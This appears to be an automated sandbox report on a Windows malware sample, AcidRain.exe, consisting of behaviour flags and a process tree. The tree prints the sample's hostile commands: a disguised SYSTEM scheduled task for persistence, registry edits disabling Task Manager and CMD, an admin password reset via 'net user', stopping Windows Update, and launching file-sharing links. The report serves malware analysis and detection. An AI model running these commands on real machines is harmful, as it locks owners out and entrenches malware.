Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\65AF.tmp\Acid Rain.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/enh1BYrI#N5sD3k_HwM4hL3-l-w2Ahb6uP2I-LyVeKgGO-CmfJA0
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\timeout.exe
Timeout 1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\net.exe
net user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR
C:\Windows\SysWOW64\timeout.exe
Timeout 1
C:\Windows\SysWOW64\net.exe
net stop wuauserv
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wuauserv
C:\Windows\SysWOW64\timeout.exe
Timeout 1
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002
C:\Windows\SysWOW64\timeout.exe
Timeout 50
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/ZXMSRSgb#CZCknCulyrMI41JcV-HN4mth37dIfpkEw6156NbD410
C:\Windows\SysWOW64\timeout.exe
Timeout 65
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
C:\Windows\SysWOW64\mspaint.exe
mspaint
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+your+own+virus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+speed+up+your+computer
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\timeout.exe
Timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6312 /prefetch:2
C:\Windows\SysWOW64\mspaint.exe
mspaint
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=FBI+OPEN+UP
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=mcafee+vs+avast
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=smudge+the+cat
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\timeout.exe
Timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+your+own+rickroll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.thisworldthesedays.com/how-to-remove-acid-rainexe-step-by-step-guide.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=is+safe+deleting+system32F
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Windows\SysWOW64\timeout.exe
Timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/file/d/1TMp5UbzwcHprY7PhC9g58KsCN9EZVdBV/view
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+make+a+ransomware+in+batch
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
